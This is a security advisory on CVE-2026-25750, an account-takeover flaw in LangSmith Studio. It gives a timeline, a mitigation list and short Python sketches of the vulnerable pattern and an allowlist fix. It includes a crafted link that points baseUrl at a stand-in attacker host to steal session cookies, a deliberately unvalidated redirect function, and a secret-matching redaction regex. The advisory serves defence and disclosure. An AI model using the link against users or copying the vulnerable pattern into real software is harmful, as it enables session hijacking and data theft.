Miggo Security — LangSmith Account Takeover (CVE-2026-25750)
AI relevance: LangSmith processes ~1 billion LLM trace events daily and stores raw tool-call I/O (SQL queries, CRM records, API payloads) — an account takeover here directly exposes proprietary prompts, model configs, and the full execution history of AI agent workflows.
- CVE-2026-25750: a logged-in LangSmith user's session token could be stolen by visiting an attacker-controlled page — no credential entry required.
- Root cause was an unvalidated `baseUrl` query parameter in LangSmith Studio (`/studio/?baseUrl=https://attacker.com`), which redirected authenticated API requests (and their cookies) to an attacker-controlled server.
- LangSmith's trace storage often retains raw tool inputs and outputs for debugging, even when masking is configured, so an attacker who hijacks an account can read internal SQL queries, CRM customer records, and proprietary source code.
- Successful exploitation also allowed stealing system prompts (the core IP defining agent behavior), exfiltrating tool call results, and modifying or deleting projects.
- The vulnerability was in the SaaS platform itself, meaning every authenticated user was simultaneously vulnerable until LangChain deployed a server-side fix.
- Miggo reported on December 1, 2025; LangChain patched cloud on December 15 and self-hosted on December 20.
- Because LangSmith is the default observability backend for LangChain/LangGraph deployments, the blast radius spans most enterprise LLM ops pipelines.
- The attack differs from classic phishing: the victim never sees a fake login page — their existing session cookie is silently exfiltrated.
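The bullets above describe an open-redirect-style flaw: a URL taken from a query parameter is trusted verbatim when routing authenticated API calls. A minimal sketch of that vulnerable pattern (all function and host names here are illustrative, not LangSmith's actual code):

```python
from urllib.parse import urlparse, parse_qs

def resolve_api_base(studio_url: str,
                     default_base: str = "https://api.smith.langchain.com") -> str:
    """Vulnerable pattern: trust a baseUrl query parameter verbatim.

    Whatever host appears in ?baseUrl=... becomes the target of subsequent
    authenticated API requests, so the session cookie is sent there.
    """
    params = parse_qs(urlparse(studio_url).query)
    # BUG: no validation -- an attacker-controlled value overrides the default
    return params.get("baseUrl", [default_base])[0]

# A victim clicking an attacker-crafted link now sends credentials off-site:
target = resolve_api_base(
    "https://smith.langchain.com/studio/?baseUrl=https://attacker.com")
# target == "https://attacker.com"
```

No credential phishing is needed: the victim's browser attaches its existing session cookie to whatever base URL the parameter names.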
Why it matters
AI observability platforms like LangSmith sit at a uniquely sensitive intersection: they ingest raw prompts, tool calls, model outputs, and sometimes credentials for connected data sources. An account takeover here is not just "read someone's chat logs" — it's access to the full execution trace of every AI agent workflow the organization runs. System prompts (often treated as trade secrets), internal API schemas, database queries, and customer data all flow through these traces. The baseUrl redirect class of bug is well-known in web security, but its impact is amplified enormously when the vulnerable platform is an AI ops hub processing billions of events.
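The standard mitigation for this bug class is strict allowlist validation of any URL accepted from a query parameter before it is used as a request target. A hedged sketch (the allowlisted hostnames are assumptions for illustration, not LangChain's actual fix):

```python
from urllib.parse import urlparse

# Hosts the Studio frontend is permitted to talk to (illustrative values)
ALLOWED_HOSTS = {"api.smith.langchain.com", "localhost", "127.0.0.1"}

def validate_base_url(raw: str) -> str:
    """Reject any baseUrl whose scheme or host is not explicitly allowlisted."""
    parsed = urlparse(raw)
    if parsed.scheme not in ("https", "http"):
        raise ValueError(f"disallowed scheme: {parsed.scheme!r}")
    if parsed.hostname not in ALLOWED_HOSTS:
        raise ValueError(f"host not on allowlist: {parsed.hostname!r}")
    return raw
```

Allowlisting beats denylisting here because URL parsing quirks (userinfo tricks like `https://trusted.com@attacker.com`, mixed-case hosts, embedded whitespace) make it easy to slip past pattern-based blocks.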
What to do
- Verify patch status: If running LangSmith self-hosted, ensure you've applied the December 2025 update. Cloud users were patched automatically.
- Audit trace data: Review what raw data your LangSmith traces expose. Enable input/output masking where possible and avoid logging PII or credentials in traces.
- Rotate credentials: If you were using LangSmith during the exposure window (before December 15 for cloud), rotate API keys and audit outbound access from LangSmith-connected services.
- Restrict trace retention: Configure shorter retention policies and limit which team members can access raw trace data.
- Monitor for abuse: Check audit logs for unusual project access, exports, or configuration changes during the exposure window.
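For the masking step above, one approach is scrubbing sensitive fields client-side before payloads ever reach the observability backend. A generic sketch (the key names and token pattern are assumptions; the LangSmith SDK also ships its own input/output hiding hooks, so check your version's documentation for the supported mechanism):

```python
import re

# Keys and string patterns to mask before traces leave the process (illustrative)
SENSITIVE_KEYS = {"password", "api_key", "authorization", "ssn", "email"}
SECRET_PATTERN = re.compile(r"(sk-[A-Za-z0-9]{8,}|Bearer\s+\S+)")

def redact(payload):
    """Recursively mask sensitive keys and token-like strings in a trace payload."""
    if isinstance(payload, dict):
        return {k: ("[REDACTED]" if k.lower() in SENSITIVE_KEYS else redact(v))
                for k, v in payload.items()}
    if isinstance(payload, list):
        return [redact(v) for v in payload]
    if isinstance(payload, str):
        return SECRET_PATTERN.sub("[REDACTED]", payload)
    return payload

example = redact({
    "api_key": "sk-abc12345",
    "query": "SELECT * FROM users",
    "headers": {"Authorization": "Bearer xyz"},
})
# example["api_key"] == "[REDACTED]"; the SQL text itself is preserved
```

Client-side redaction limits the blast radius of exactly the scenario in this advisory: even with a hijacked session, the attacker sees masked placeholders instead of raw credentials and PII.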